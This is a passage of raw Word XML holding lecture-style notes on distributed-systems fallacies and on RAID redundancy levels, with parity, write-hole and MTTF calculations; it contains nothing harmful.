        <w:t xml:space="preserve">  Code pattern: input validation, graceful degradation, config validation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11AE9B4E" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7288BFB2" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t>Fallacy 7: Transport cost is zero</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="032F10FF" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">  Reality: serialization/deserialization, memory allocation, GC pressure</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FABA788" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  Implication: call frequency × payload size × serialization cost = real CPU cost</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3746DC48" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  Code pattern: binary protocols (Protobuf), object reuse, connection pooling</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="347D98C3" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="515A4C2D" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t>Fallacy 8: The network is homogeneous</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1029444D" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  Reality: different MTUs, different latencies, IPv4/IPv6 mixed, different QoS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A2DEB4F" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  Implication: lowest common denominator networking; test on varied infrastructure</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EA8E50D" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  Code pattern: MTU discovery, protocol negotiation, network policy</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60681C21" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:pict w14:anchorId="7106586A">
          <v:rect id="_x0000_i6439" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="150C1A4C" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00476518">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>2. Redundancy — The Foundation of Fault Tolerance</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C599633" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00476518">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Hardware Redundancy — RAID, ECC, and Beyond</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63E3EC08" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>RAID (Redundant Array of Independent Disks) — the canonical redundancy example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39E2D004" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D52EC83" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t>RAID 0 (Striping) — not fault tolerant, included for completeness:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01484D3D" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  Data split across N disks in stripes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DC7C300" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  Read/write: N× bandwidth (parallel I/O)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0390A66E" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  Fault tolerance: ZERO — any single disk failure loses all data</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F4D7737" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  Use: scratch space, video editing, when speed matters more than durability</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39E36E18" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="650364E2" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t>RAID 1 (Mirroring):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E422DF5" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  Data written identically to 2+ disks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BE9F382" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  Read: either disk (often reads from both for verification or load balancing)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="392FA475" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  Write: must complete on ALL mirrors before acknowledging</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73C4FB5C" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66EBF6F9" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  Fault tolerance: survives N-1 disk failures (for N mirrors)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="056EA6B9" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  Recovery: copy surviving mirror to replacement disk</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00FEA8C7" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="449D9C28" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  Write performance:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D7C7768" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">    Parallel writes: limited by slowest disk</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AFDC405" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">    Write amplification: 2× (each write goes to 2 disks)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5455DBBE" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CDBDF63" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  Space efficiency: 50% (N disks → N/2 usable capacity)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A15D13A" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52086613" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  MTTF calculation for RAID 1:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2740D619" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">    P(both disks fail before recovery): P(disk1 fails) × P(disk2 fails during recovery)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D6245D5" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E1E0AE5" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">    MTTF_disk = 100,000 hours (typical enterprise HDD)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2194B940" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">    Recovery time = 24 hours</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61939FB8" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77633D04" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">    P(disk1 fails in year) = 8760 / 100,000 = 8.76%</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3528C73A" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">    P(disk2 fails during 24h recovery | disk1 failed) = 24 / 100,000 = 0.024%</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="786FD0D0" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74AAA61C" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">    P(data loss in year) = 8.76% × 0.024% = 0.0021%</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51B36566" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">    MTTF_RAID1 ≈ 100,000² / 24 ≈ 417,000,000 hours ≈ 47,000 years</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A45E32D" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16292F7C" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t>RAID 5 (Striping with Distributed Parity):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="450F5E5F" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  Data striped across N disks with parity distributed across all disks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79A4306F" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AE30EEE" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  Parity computation:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63C09CFF" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">    For each stripe: parity = data1 XOR data2 XOR ... XOR data(N-1)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F53C8FC" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">    Stored on different disk per stripe (rotation prevents one disk being bottleneck)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C527064" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01AEAE7C" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">  Read: all N disks in parallel (minus 1 for parity = N-1 effective throughput)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25686BCB" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  Write: must read old data + old parity, compute new parity, write new data + new parity</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31FC0CB0" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">    "Read-modify-write": expensive for small random writes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D7F806C" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">    4 I/Os for each small write: read old data, read old parity, write new data, write new parity</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F6E89D3" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">    RAID 5 write hole: if crash during these 4 I/Os → inconsistent parity</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EAA2E49" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">    Mitigation: write-intent bitmap (tracks which stripes are being written)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01BE56B4" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E10E2FF" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  Fault tolerance: survives any 1 disk failure</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68E145E6" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  Recovery: reconstruct failed disk by XOR of all surviving data + parity</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="254383AA" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">    Recovery time: 4-24 hours for large disks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A1ED4F2" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">    During recovery: performance degraded (all I/Os require reading surviving disks)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BDC06A0" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42F7299A" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  Space efficiency: (N-1)/N (1 disk worth of capacity for parity)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F03CDFE" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="700242F7" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  RAID 5 write hole (critical flaw):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21CFF8B1" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">    Crash during partial stripe write:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="428454A0" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">      Old parity on disk, new data on one disk</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69AF4C0C" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">      On recovery: parity is inconsistent with data</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="050564F8" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">      Silent data corruption — reads return wrong data without error</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AFF3431" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B821B2F" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">    Solution: RAID 6, ZFS with checksums, or BBU (Battery-Backed Unit) write cache</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7959BCAD" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02A83A8D" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t>RAID 6 (Striping with Double Parity):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0ADAF6E3" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  Two independent parity calculations per stripe (P and Q)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D3E16C5" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  P: simple XOR parity (like RAID 5)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21FC45CC" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  Q: Reed-Solomon code (polynomial evaluation over Galois Field GF(2^8))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="660E5D34" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="501A92BE" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  Fault tolerance: survives any 2 simultaneous disk failures</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="267C70B8" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  Space efficiency: (N-2)/N</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EFD19B0" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1ECF3C6C" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  Why RAID 6 vs RAID 5 for large arrays:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F4DB9A7" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">    MTTF analysis for RAID 5 with modern large disks:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33D7FAE9" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">      8TB disk, read speed = 200MB/s</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FC17BCE" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">      Rebuild time = 8TB / 200MB/s = 11 hours</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CB792C2" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">      During 11-hour rebuild: probability of second failure?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6985FF4E" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">      </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54A04394" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">      Modern "AFR" (Annual Failure Rate) = 1-5% per disk</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="234D625A" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">      P(second failure in 11 hours | first failed) = (0.05 × 8 disks × 11) / 8760 ≈ 0.05%</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AC2EB83" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">      </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52D1F21B" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">      For 1,000-drive array rebuilt annually:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B41D6C4" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">        Expected data loss events ≈ 0.05% × 1000 / 8 × 365/365 ≈ 0.06 events/year</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07D8F8B2" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">        → About 1 data loss every 16 years — too frequent for production</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29C96FD3" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">        </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FD3BD1B" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
